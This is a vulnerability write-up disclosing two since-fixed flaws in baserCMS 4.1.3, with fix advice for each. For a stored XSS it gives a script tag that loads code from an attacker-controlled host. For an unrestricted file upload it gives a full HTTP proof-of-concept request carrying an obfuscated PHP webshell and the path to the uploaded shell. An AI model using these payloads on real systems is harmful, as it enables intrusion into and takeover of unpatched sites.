baserCMS 漏洞披漏

Description

baserCMS(ベーサーシーエムエス)とは、直感的な操作と高いメンテナンス性を実現し、Webサイトを自由にカスタマイズできる国産CMS(コンテンツ・マネージメント・システム)です。日本人が日本人の為に、みんなで作っているオープンソース・ソフトウェアです。無料で利用でき、様々なサーバーで動作可能で、インストールも簡単です。

オープンソース・フレームワーク「CakePHP」をベースとしているので、カスタマイズ性、メンテナンス性が高いのが特徴です。

ツリー構造により固定ページ、ブログ、フォームをまとめて管理できる、強力なコンテンツ管理機能を持つCMSです。Webサイトに最低限必要となるメールフォームや新着ブログなどのプラグインや管理画面の枠組みを最初から装備しており、スマートフォンにも標準対応しています。

マニュアルやソースコードのコメントにおいて日本語を標準としているのも国産CMSの強みです。 ———— it’s copy from https://basercms.net/about/index.html

I found two vulnerability in basicCMS 4.1.3.

storage xss vulnerability(fixed)

There is a storage xss vulnerability in the category name editor after login with normal administrator privileges.

Example

We register two administrator accounts with different permissions:システム管理 and サイト運営
图1
Log in to the system using サイト運営 privileged account root:
图2
In the Register New Category feature of the Upload menu, the category name can execute a malicious xss statement:
图3
After the administrator logs in, accessing the page triggers:
图4
So,We can insert malicious javascript according to the vulnerability to override the administrator function.
For example
The root user does not have permission to access
http://127.0.0.1/basercms/admin/site_configs/del_cache” to delete the server cache information:
图5
We can exploit this vulnerability to implement an attack:
Since the data[UploaderCategory][name] parameter has a length limit, We can insert the following statement first:
<script src="http://vps_ip/1.js"></script>
Then, 1.js uses ajax to write a get request to
http://127.0.0.1/basercms/admin/site_configs/del_cache:
图6
Verify: The root (asda)user refreshes the page:
图7
And when the administrator user(ad_lab) accesses the page, it triggers js and deletes the server cache.
图8
Finally, I found the corresponding code with defects.
UploaderCategoriesController.php
图9
It was found that the カテゴリ名(data[UploaderCategory][name])parameter submitted by the user did not filter the malicious characters,

Solution:

Note: The issue has been reported in 2018 09 and was resolved by a developer of baserCMS. Announcement address

Code Execution Vulnerability(fixed)

Process

Download the latest version of basercms (4.1.3).In \basercms\lib\Baser\Model\ThemeConfig.php, you can see that the uploaded file suffix is not checked, so we can upload the webshell file directly.

In the saveImage method of \basercms\lib\Baser\Model\ThemeConfig.php we can see that is about saving the logo during the theme setup:
图10
We can seen move_uploaded_file method,Then audit code,It can be seen that the image is saved here and the suffix is not verified.,Only limited the image name (logo),So you can get server permissions by uploading php webshell.
Poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
POST /basercms/admin/theme_configs/form HTTP/1.1
Host: 127.0.0.1
Content-Length: 3986
Cache-Control: max-age=0
Origin: http://127.0.0.1
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfOCEZtinjMBherH4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://127.0.0.1/basercms/admin/theme_configs/form
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: BASERCMS=vfshte61c73tufbvit1j63amv2
Connection: close

------WebKitFormBoundaryfOCEZtinjMBherH4
Content-Disposition: form-data; name="_method"

POST
------WebKitFormBoundaryfOCEZtinjMBherH4
Content-Disposition: form-data; name="data[_Token][key]"

65d6c82611c9eb9840aef42c97d82c36847093f574cbe4c2cb7964537a3d594b19d92b9c116bd3595e0f14ba510a880e1a2573033f81a71dd25800d09917183a
------WebKitFormBoundaryfOCEZtinjMBherH4
Content-Disposition: form-data; name="data[ThemeConfig][color_main]"

e371e3
------WebKitFormBoundaryfOCEZtinjMBherH4
Content-Disposition: form-data; name="data[ThemeConfig][color_sub]"

21b537
------WebKitFormBoundaryfOCEZtinjMBherH4
Content-Disposition: form-data; name="data[ThemeConfig][color_link]"

1808f5
------WebKitFormBoundaryfOCEZtinjMBherH4
Content-Disposition: form-data; name="data[ThemeConfig][color_hover]"

ed8815
------WebKitFormBoundaryfOCEZtinjMBherH4
Content-Disposition: form-data; name="data[ThemeConfig][logo]"; filename="x.php"
Content-Type: application/octet-stream

<?php $a = "a"."s"."s"."e"."r"."t"; $a($_GET[cc]); ?>
------WebKitFormBoundaryfOCEZtinjMBherH4
Content-Disposition: form-data; name="data[ThemeConfig][logo_alt]"

baserCMS
------WebKitFormBoundaryfOCEZtinjMBherH4
Content-Disposition: form-data; name="data[ThemeConfig][logo_link]"
...

Then according to the code description, you can get the webshell path:
http://127.0.0.1/basercms/files/theme_configs/logo.php
Command execution:
图11

Solution:

Whitelist restrictions on upload file suffixes such as (jpg, png, gif, jpeg etc.)
Note: The issue has been reported in 2018 09 and was resolved by a developer of baserCMS. Announcement address

Vulnerability information page:

https://basercms.net/security/CVE-2018-18942_CVE-2018-18943

-------------本文结束感谢您的阅读-------------